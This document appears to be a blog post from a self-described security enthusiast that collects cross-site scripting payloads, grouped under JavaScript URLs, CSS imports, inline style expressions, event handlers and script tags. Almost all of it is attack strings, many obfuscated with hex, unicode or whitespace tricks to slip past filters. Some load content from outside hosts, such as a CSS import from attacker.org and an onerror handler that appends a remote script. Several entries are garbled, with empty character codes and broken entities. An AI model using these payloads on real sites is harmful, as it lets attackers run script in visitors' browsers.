XSS Payload Collection
A collection of XSS payloads, grouped into five categories for easy reference.
#Category 1: JavaScript URL
<a href="javascript:alert('test')">link</a>
<a href="javascript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript:alert(1)">Hello</a>
<a href=javascript:alert("XSS")>link</a>
<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>
<a href=javascript:alert(String.fromCharCode(,,))>link</a>
<a href="javascript:alert(1)">link</a>
<a href="javaSCRIPT:alert(1)">Hello</a>
<a href="javasc
ript:alert(1)">link</a>
<a href="javas	cript:\u0061lert(1);">Hello</a>
<a href="jav ascript:alert('XSS')">link</a>
<a href="jav ascript:alert('XSS')">link</a>
<a href="jav ascript:alert('XSS')">link</a>
<a href="  javascript:alert('XSS');">link</a>
<a href="javascript:\u0061lert(1)">Hello</a>
<a href="javascript:confirm`1`">link</a>
<a href="javascript:confirm(1)">link</a>
<a href="j	a	vas	c	r	ipt:alert(1)"></a>
<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>
<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></a>
<a href=javascript:eval("alert('xss')")>link</a>
<a href=&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;>link</a>
<a href=&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#>link</a>
<a href=javascript:alert('XSS')>link</a>
<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a>
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></a>
<iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
#Category 2: CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>
#Category 3: Inline style
<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert())></div>
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<div style="z:exp/*anything*/res/*here*/sion(alert(1))">
<div style=xss:expr/*XSS*/ession(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")>
<img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6
<img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">
<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
#Category 4: JavaScript events
<div onclick="alert('xss')">
<div onmouseenter="alert('xss')">
<div onclick ="alert('xss')">
<BODY ONLOAD=alert('XSS')>
<img src= onerror=alert()>
<img/src=''/onerror=alert()>
<img src="" onerror="alert(1)" />
<img src= alt=al lang=ert onerror=top[alt+lang]()>
<img src="" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>
<img src= onmouseover=alert('xss') a1=>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>
<a href="#" onclick=alert('\170\163\163')>test</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a>
<a href="#" onclick="alert('xss')">link</a>
<marquee onscroll=alert()> test</marquee>
<div style="width:100px;height:100px;overflow:scroll" onscroll="alert('a')"> <br/><br/><br/><br/><br/></div>
<DIV onmousewheel="alert('a')" ></DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div style="background-color:red" onmouseenter="alert('a')"></div>
<DIV onmouseleave="alert('1')"></DIV>
<div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>
<marquee onstart="alert('a')" >asdf</marquee>
<div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div>
<div style="background-color:red;" onbeforecut="alert('a')" >asdf</div>
<div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div>
<div style="background-color:red;" ="true" onbeforepaste="alert('a')" >asdf</div>
<div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div>
<div style="background-color:red;" oncopy="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div>
<div style="background-color:red;" ondrag="alert('1')" >asdf</div>
<div style="background-color:red;" ondragend="alert('a')" >asdf</div>
<div style="background-color:red;" ondragenter="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div>
<div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div>
<div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div>
<div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div>
<div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div>
<div contentEditable="true" onbeforeactivate="alert('b')">asdf</div>
<div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div>
<div contentEditable="true" ondeactivate="alert('bem')">asdf</div>
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)">
<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio>
<body onscroll=alert()><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<input type="hidden" accesskey="X" onclick="alert(/xss/)">
#Category 5: Script tag
<script src="http://baidu.com"></script>
<script>alert("XSS")</script>
<scr<script>ipt>alert("XSS")</scr<script>ipt>
<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>
<script>alert(//.source)</script>
<script>alert();</script>
<script>prompt();</script>
<script>confirm();</script>
<script>alert(//)</script>
<script>alert(`a`)</script>
<script>alert('a')</script>
<SCRIPT>alert(String.fromCharCode(,,))</SCRIPT>
<script>eval(alert())</script>
<script>eval(String.fromCharCode(, , , , , , , , , ))</script>
<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>
<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script>setTimeout(alert(),)</script>
<script>setTimeout`alert\x28\x27 xss \x27\x29`</script>
<script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>
<script src=data:text/javascript,alert()></script>
<script src=&#&#&#&#:text/javascript,alert()></script>
<script>\u0061\u006C\u0065\u0072\u0074()</script>
<script>\u0061\u006C\u0065\u0072\u0074()</script>
<script>\u0061\u006C\u0065\u0072\u0074`a`</script>
<script>window['alert']()</script>
<script>parent['alert']()</script>
<script>self['alert']()</script>
<script>top['alert']()</script>
<!--[if]><script>alert()</script -->
<script>alert("xss");;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
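About me: a network security enthusiast dedicated to sharing original, high-quality, practical content. You are welcome to follow my personal WeChat public account, Bypass--, to browse more articles.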
